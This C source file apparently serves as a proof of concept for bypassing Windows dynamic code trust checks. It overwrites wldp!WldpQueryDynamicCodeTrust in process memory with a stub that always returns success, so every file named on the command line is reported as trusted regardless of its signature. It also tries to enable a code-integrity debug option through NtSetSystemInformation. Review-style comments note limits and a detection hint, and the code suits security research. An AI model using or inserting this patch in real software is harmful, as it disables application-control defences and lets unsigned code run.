  1. /**
  2.   BSD 3-Clause License
  3.  
  4.   Copyright (c) 2019 Odzhan. All rights reserved.
  5.  
  6.   Redistribution and use in source and binary forms, with or without
  7.   modification, are permitted provided that the following conditions are met:
  8.  
  9.   * Redistributions of source code must retain the above copyright notice, this
  10.     list of conditions and the following disclaimer.
  11.  
  12.   * Redistributions in binary form must reproduce the above copyright notice,
  13.     this list of conditions and the following disclaimer in the documentation
  14.     and/or other materials provided with the distribution.
  15.  
  16.   * Neither the name of the copyright holder nor the names of its
  17.     contributors may be used to endorse or promote products derived from
  18.     this software without specific prior written permission.
  19.  
  20.   THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
  21.   AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
  22.   IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
  23.   DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
  24.   FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
  25.   DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
  26.   SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
  27.   CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
  28.   OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
  29.   OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
  30. */
  31.  
  32. #include <windows.h>
  33. #include <wldp.h>
  34. #include <stdio.h>
  35.  
  36.  
// Signature of wldp!WldpIsDynamicCodePolicyEnabled. Presumably writes whether a
// dynamic code policy is in force to *isEnabled (main prints it as
// "enabled"/"disabled") — confirm against wldp.h.
typedef HRESULT (WINAPI *WldpIsDynamicCodePolicyEnabled_t)(
    PBOOL  isEnabled);

// Signature of wldp!WldpQueryDynamicCodeTrust. VerifyCodeTrust passes
// fileHandle = 0 together with a read-only mapping of the file as
// baseImage/ImageSize, so the base/size pair appears to be sufficient on its
// own — confirm against wldp.h. S_OK means the image is trusted.
typedef HRESULT (WINAPI *WldpQueryDynamicCodeTrust_t)(
    HANDLE fileHandle,
    PVOID  baseImage,
    ULONG  ImageSize);
  44.  
// Replacement body for wldp!WldpQueryDynamicCodeTrust: ignores every argument
// and reports success, so any image queried through the patched export is
// treated as trusted. Keep this free of calls and data references — PatchWldp
// copies its machine code byte-for-byte into wldp.dll, where any relative
// reference would point at the wrong place.
static HRESULT WINAPI WldpQueryDynamicCodeTrustStub(
    HANDLE fileHandle,
    PVOID  baseImage,
    ULONG  ImageSize)
{
    (void)fileHandle;
    (void)baseImage;
    (void)ImageSize;
    return S_OK;
}
  53.  
// Empty marker placed directly after the stub in source. PatchWldp uses the
// distance between this function's address and the stub's as the stub's byte
// length, which only holds if the compiler emits the two adjacently and in
// source order (not guaranteed under optimisation or incremental linking).
static VOID WldpQueryDynamicCodeTrustStubEnd(VOID) { return; }
  55.  
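// Overwrites the first bytes of wldp!WldpQueryDynamicCodeTrust in this
// process's mapping of wldp.dll with WldpQueryDynamicCodeTrustStub, so every
// subsequent trust query made through that export returns S_OK. The write hits
// this process's private copy of the page only; other processes keep the
// original code. Defenders can spot this by comparing the in-memory text of
// wldp.dll with the on-disk image.
//
// Returns TRUE when the bytes were written, FALSE if wldp.dll or the export
// could not be found, the computed stub length is implausible, or the page
// could not be made writable.
static BOOL PatchWldp(VOID) {
    HMODULE wldp;
    SIZE_T  len;
    DWORD   oldProt, tmpProt;
    LPVOID  target;

    // Restrict the search to System32: an unqualified LoadLibrary("wldp") would
    // first look in the application directory, where a planted wldp.dll could
    // be substituted.
    wldp = LoadLibraryExA("wldp.dll", NULL, LOAD_LIBRARY_SEARCH_SYSTEM32);
    if(wldp == NULL) return FALSE;

    target = (LPVOID)GetProcAddress(wldp, "WldpQueryDynamicCodeTrust");
    if(target == NULL) return FALSE;

    // Stub length = distance to the empty marker function that follows it in
    // source. This assumes the compiler laid the two out adjacently and in
    // order; with /O2 reordering or incremental-link thunks that assumption
    // breaks and the subtraction yields garbage (0, or a huge wrapped value).
    // The stub is a handful of bytes, so reject anything outside a small
    // window rather than memcpy past the end of the target function.
    // TODO(review): confirm the bound against the built binary.
    len = (ULONG_PTR)WldpQueryDynamicCodeTrustStubEnd -
          (ULONG_PTR)WldpQueryDynamicCodeTrustStub;
    if(len == 0 || len > 64) return FALSE;

    if(!VirtualProtect(target, len, PAGE_EXECUTE_READWRITE, &oldProt)) {
      return FALSE;
    }

    memcpy(target, (const void *)WldpQueryDynamicCodeTrustStub, len);

    // Best effort: the patch is in place whether or not the original
    // protection can be restored.
    VirtualProtect(target, len, oldProt, &tmpProt);

    // Harmless on x86/x64; documented as required where the instruction cache
    // is not coherent with data writes (e.g. ARM).
    FlushInstructionCache(GetCurrentProcess(), target, len);

    return TRUE;
}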
  90.  
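// Asks wldp!WldpQueryDynamicCodeTrust whether the file at `path` is trusted
// under the current dynamic code policy. The file is mapped read-only and
// handed over as a base/size pair with fileHandle = NULL. Returns TRUE only if
// the call returns S_OK; any failure to load wldp, open, size or map the file
// yields FALSE.
//
// NOTE: the answer is only meaningful while WldpQueryDynamicCodeTrust is
// unmodified in this process. After PatchWldp() it is unconditionally S_OK,
// which is exactly what main() demonstrates.
//
// Fixes over the original: LoadLibrary result was not checked before
// GetProcAddress; GetFileSize's high DWORD and INVALID_FILE_SIZE were ignored,
// so a >4 GiB file would have been passed with a truncated ULONG size; the
// module reference was never released.
BOOL VerifyCodeTrust(const char *path) {
    WldpQueryDynamicCodeTrust_t pfnQueryTrust;
    HMODULE                     wldp;
    HANDLE                      file, map;
    LPVOID                      mem;
    LARGE_INTEGER               size;
    HRESULT                     hr = E_FAIL;   // anything but S_OK -> FALSE

    // System32 only, so a same-named DLL in the application directory cannot
    // be picked up by the default search order.
    wldp = LoadLibraryExA("wldp.dll", NULL, LOAD_LIBRARY_SEARCH_SYSTEM32);
    if(wldp == NULL) {
      printf("Unable to load WLDP.dll.\n");
      return FALSE;
    }

    pfnQueryTrust = (WldpQueryDynamicCodeTrust_t)
      GetProcAddress(wldp, "WldpQueryDynamicCodeTrust");
    if(pfnQueryTrust == NULL) {
      printf("Unable to resolve address for WLDP.dll!WldpQueryDynamicCodeTrust.\n");
      FreeLibrary(wldp);
      return FALSE;
    }

    file = CreateFileA(
      path, GENERIC_READ, FILE_SHARE_READ,
      NULL, OPEN_EXISTING,
      FILE_ATTRIBUTE_NORMAL, NULL);

    if(file != INVALID_HANDLE_VALUE) {
      // ImageSize is a ULONG: reject empty files and anything that does not
      // fit in 32 bits instead of silently truncating the length.
      if(GetFileSizeEx(file, &size) &&
         size.HighPart == 0 && size.LowPart != 0)
      {
        map = CreateFileMappingA(file, NULL, PAGE_READONLY, 0, 0, NULL);
        if(map != NULL) {
          mem = MapViewOfFile(map, FILE_MAP_READ, 0, 0, 0);
          if(mem != NULL) {
            hr = pfnQueryTrust(NULL, mem, size.LowPart);
            UnmapViewOfFile(mem);
          }
          CloseHandle(map);
        }
      }
      CloseHandle(file);
    }

    FreeLibrary(wldp);
    return hr == S_OK;
}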
  137.  
  138. #include "C:\ntlib\ntddk.h"
  139.  
// SYSTEM_INFORMATION_CLASS value used with NtQuerySystemInformation /
// NtSetSystemInformation below.
#define SystemCodeIntegrityInformation 0x67

// Bit flags reported in SYSTEM_CODEINTEGRITY_INFORMATION.CodeIntegrityOptions;
// ListCIOptions prints the name of each bit that is set.
// NOTE(review): the WDK's own ntddk.h defines these same names. If the
// ntddk.h included above already provides them, these lines are
// redefinitions — confirm against the header actually in use.
#define CODEINTEGRITY_OPTION_ENABLED                      0x0001
#define CODEINTEGRITY_OPTION_TESTSIGN                     0x0002
#define CODEINTEGRITY_OPTION_UMCI_ENABLED                 0x0004
#define CODEINTEGRITY_OPTION_UMCI_AUDITMODE_ENABLED       0x0008
#define CODEINTEGRITY_OPTION_UMCI_EXCLUSIONPATHS_ENABLED  0x0010
#define CODEINTEGRITY_OPTION_TEST_BUILD                   0x0020
#define CODEINTEGRITY_OPTION_PREPRODUCTION_BUILD          0x0040
#define CODEINTEGRITY_OPTION_DEBUGMODE_ENABLED            0x0080
#define CODEINTEGRITY_OPTION_FLIGHT_BUILD                 0x0100
#define CODEINTEGRITY_OPTION_FLIGHTING_ENABLED            0x0200
#define CODEINTEGRITY_OPTION_HVCI_KMCI_ENABLED            0x0400
#define CODEINTEGRITY_OPTION_HVCI_KMCI_AUDITMODE_ENABLED  0x0800
#define CODEINTEGRITY_OPTION_HVCI_KMCI_STRICTMODE_ENABLED 0x1000
#define CODEINTEGRITY_OPTION_HVCI_IUM_ENABLED             0x2000
  156.  
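// One row of the CODEINTEGRITY_OPTION_* name table: a single option bit and
// its printable name. The table is terminated by a {0, NULL} row.
typedef struct _ci_opt {
    ULONG       ulOption;   // exactly one CODEINTEGRITY_OPTION_* bit
    const char *szOption;   // name; points at a string literal, hence const
} ci_opt;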
  161.  
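// Name table used by ListCIOptions to decode CodeIntegrityOptions. Read-only
// and file-local: nothing writes it, and keeping it const prevents the names
// from being altered at runtime. Terminated by the {0, NULL} row.
static const ci_opt options[] = {
  {CODEINTEGRITY_OPTION_ENABLED,                      "CODEINTEGRITY_OPTION_ENABLED"},
  {CODEINTEGRITY_OPTION_TESTSIGN,                     "CODEINTEGRITY_OPTION_TESTSIGN"},
  {CODEINTEGRITY_OPTION_UMCI_ENABLED,                 "CODEINTEGRITY_OPTION_UMCI_ENABLED"},
  {CODEINTEGRITY_OPTION_UMCI_AUDITMODE_ENABLED,       "CODEINTEGRITY_OPTION_UMCI_AUDITMODE_ENABLED"},
  {CODEINTEGRITY_OPTION_UMCI_EXCLUSIONPATHS_ENABLED,  "CODEINTEGRITY_OPTION_UMCI_EXCLUSIONPATHS_ENABLED"},
  {CODEINTEGRITY_OPTION_TEST_BUILD,                   "CODEINTEGRITY_OPTION_TEST_BUILD"},
  {CODEINTEGRITY_OPTION_PREPRODUCTION_BUILD,          "CODEINTEGRITY_OPTION_PREPRODUCTION_BUILD"},
  {CODEINTEGRITY_OPTION_DEBUGMODE_ENABLED,            "CODEINTEGRITY_OPTION_DEBUGMODE_ENABLED"},
  {CODEINTEGRITY_OPTION_FLIGHT_BUILD,                 "CODEINTEGRITY_OPTION_FLIGHT_BUILD"},
  {CODEINTEGRITY_OPTION_FLIGHTING_ENABLED,            "CODEINTEGRITY_OPTION_FLIGHTING_ENABLED"},
  {CODEINTEGRITY_OPTION_HVCI_KMCI_ENABLED,            "CODEINTEGRITY_OPTION_HVCI_KMCI_ENABLED"},
  {CODEINTEGRITY_OPTION_HVCI_KMCI_AUDITMODE_ENABLED,  "CODEINTEGRITY_OPTION_HVCI_KMCI_AUDITMODE_ENABLED"},
  {CODEINTEGRITY_OPTION_HVCI_KMCI_STRICTMODE_ENABLED, "CODEINTEGRITY_OPTION_HVCI_KMCI_STRICTMODE_ENABLED"},
  {CODEINTEGRITY_OPTION_HVCI_IUM_ENABLED,             "CODEINTEGRITY_OPTION_HVCI_IUM_ENABLED"},
  {0, NULL}   // sentinel
};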
  179.  
// Buffer for the SystemCodeIntegrityInformation class. The callers in this
// file (ListCIOptions, EnableCIOption) set Length to sizeof(this struct)
// before issuing the query.
// NOTE(review): the WDK's ntddk.h declares this struct as well; if that is the
// header included above, this is a redefinition — confirm.
typedef struct _SYSTEM_CODEINTEGRITY_INFORMATION {
    ULONG  Length;                 // sizeof(SYSTEM_CODEINTEGRITY_INFORMATION)
    ULONG  CodeIntegrityOptions;   // CODEINTEGRITY_OPTION_* bit mask
} SYSTEM_CODEINTEGRITY_INFORMATION, *PSYSTEM_CODEINTEGRITY_INFORMATION;
  184.  
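// Queries SystemCodeIntegrityInformation and prints the name of every
// CODEINTEGRITY_OPTION_* bit that is set, preceded by the raw mask so bits
// not present in the options[] table remain visible. On failure the NTSTATUS
// is printed (the original returned silently, hiding e.g. an unsupported
// information class).
VOID ListCIOptions(VOID) {
    NTSTATUS                         status;
    SYSTEM_CODEINTEGRITY_INFORMATION scii;
    ULONG                            retlen = 0;
    DWORD                            i;

    // The structure carries its own size; fill it in as the original does.
    scii.Length               = sizeof(scii);
    scii.CodeIntegrityOptions = 0;

    status = NtQuerySystemInformation(
      SystemCodeIntegrityInformation,
      &scii, sizeof(scii), &retlen);

    if(!NT_SUCCESS(status)) {
      printf("NtQuerySystemInformation(SystemCodeIntegrityInformation) failed: %08lx\n",
        status);
      return;
    }

    printf("\nCode Integrity Options.\n\n");
    printf("CodeIntegrityOptions = 0x%08lx\n", scii.CodeIntegrityOptions);

    for(i = 0; options[i].ulOption != 0; i++) {
      if(scii.CodeIntegrityOptions & options[i].ulOption) {
        printf("%s\n", options[i].szOption);
      }
    }
}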
  205.  
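// Attempts to turn on `Option` in the live code-integrity option mask by
// reading the current mask and writing it back with the bit added via
// NtSetSystemInformation. The author observes that the set call is rejected
// with STATUS_INVALID_INFO_CLASS, which suggests these options are enforced by
// the kernel and are not writable from user mode; the status is printed so the
// outcome is visible. Returns TRUE only if the set call succeeds.
//
// Fix: the original ignored `Option` and always OR'd in
// CODEINTEGRITY_OPTION_DEBUGMODE_ENABLED.
// NOTE(review): the documented NtSetSystemInformation takes three arguments
// (class, buffer, length). The fourth argument passed here compiles only if
// the local ntddk.h prototypes it that way — confirm against that header.
BOOL EnableCIOption(ULONG Option) {
    NTSTATUS                         status;
    SYSTEM_CODEINTEGRITY_INFORMATION scii;
    ULONG                            retlen = 0;

    scii.Length               = sizeof(scii);
    scii.CodeIntegrityOptions = 0;

    status = NtQuerySystemInformation(
      SystemCodeIntegrityInformation,
      &scii, sizeof(scii), &retlen);

    if(!NT_SUCCESS(status)) {
      printf("query failed, status is %08lx\n", status);
      return FALSE;
    }

    scii.CodeIntegrityOptions |= Option;

    status = NtSetSystemInformation(
      SystemCodeIntegrityInformation,
      &scii, sizeof(scii), &retlen);

    printf("status is %08lx\n", status);

    return NT_SUCCESS(status);
}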
  229.  
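// Entry point. Demonstrates, in order: that a code-integrity option cannot be
// set from user mode (EnableCIOption), the current CI options (ListCIOptions),
// the WLDP dynamic code policy state, and finally that once
// wldp!WldpQueryDynamicCodeTrust is patched in this process every file named
// on the command line is reported as trusted regardless of its signature. The
// patch is confined to this process's mapping of wldp.dll.
//
// Fixes over the original: the policy query resolved the wrong export
// ("WldpQueryDynamicCodeTrust") and called it through the
// WldpIsDynamicCodePolicyEnabled signature, leaving `enabled` uninitialised;
// a failed lookup was reported but the null pointer was still called; and
// missing or inaccessible paths were silently skipped because
// INVALID_FILE_ATTRIBUTES has the directory bit set.
int main(int argc, char *argv[]) {
    WldpIsDynamicCodePolicyEnabled_t pfnIsPolicyEnabled;
    HMODULE                          wldp;
    BOOL                             enabled = FALSE;
    HRESULT                          hr;
    DWORD                            attrs;
    int                              i;

    // Expected to be rejected by the kernel; output is informational.
    EnableCIOption(CODEINTEGRITY_OPTION_DEBUGMODE_ENABLED);

    ListCIOptions();

    // System32 only, so a planted wldp.dll in the application directory is not
    // loaded ahead of the real one.
    wldp = LoadLibraryExA("wldp.dll", NULL, LOAD_LIBRARY_SEARCH_SYSTEM32);
    if(wldp == NULL) {
      printf("unable to load Wldp.\n");
      return 0;
    }

    pfnIsPolicyEnabled = (WldpIsDynamicCodePolicyEnabled_t)
      GetProcAddress(wldp, "WldpIsDynamicCodePolicyEnabled");
    if(pfnIsPolicyEnabled == NULL) {
      printf("unable to resolve Wldp!WldpIsDynamicCodePolicyEnabled.\n");
      return 0;
    }

    hr = pfnIsPolicyEnabled(&enabled);
    if(hr != S_OK) {
      printf("WldpIsDynamicCodePolicyEnabled failed, status is %08lx.\n", hr);
      return 0;
    }

    printf("Wldp Code Policy is %s.\n",
      enabled ? "enabled" : "disabled");

    if(!PatchWldp()) {
      printf("unable to patch Wldp.\n");
      return 0;
    }

    for(i = 1; i < argc; i++) {
      attrs = GetFileAttributesA(argv[i]);

      // Report paths that cannot be queried rather than dropping them.
      if(attrs == INVALID_FILE_ATTRIBUTES) {
        printf("%-8s : %s\n", "MISSING", argv[i]);
        continue;
      }
      // skip directories
      if(attrs & FILE_ATTRIBUTE_DIRECTORY) continue;

      // With the patch in place this prints OK for every regular file.
      printf("%-8s : %s\n",
        VerifyCodeTrust(argv[i]) ? "OK" : "FAILED",
        argv[i]);
    }
    return 0;
}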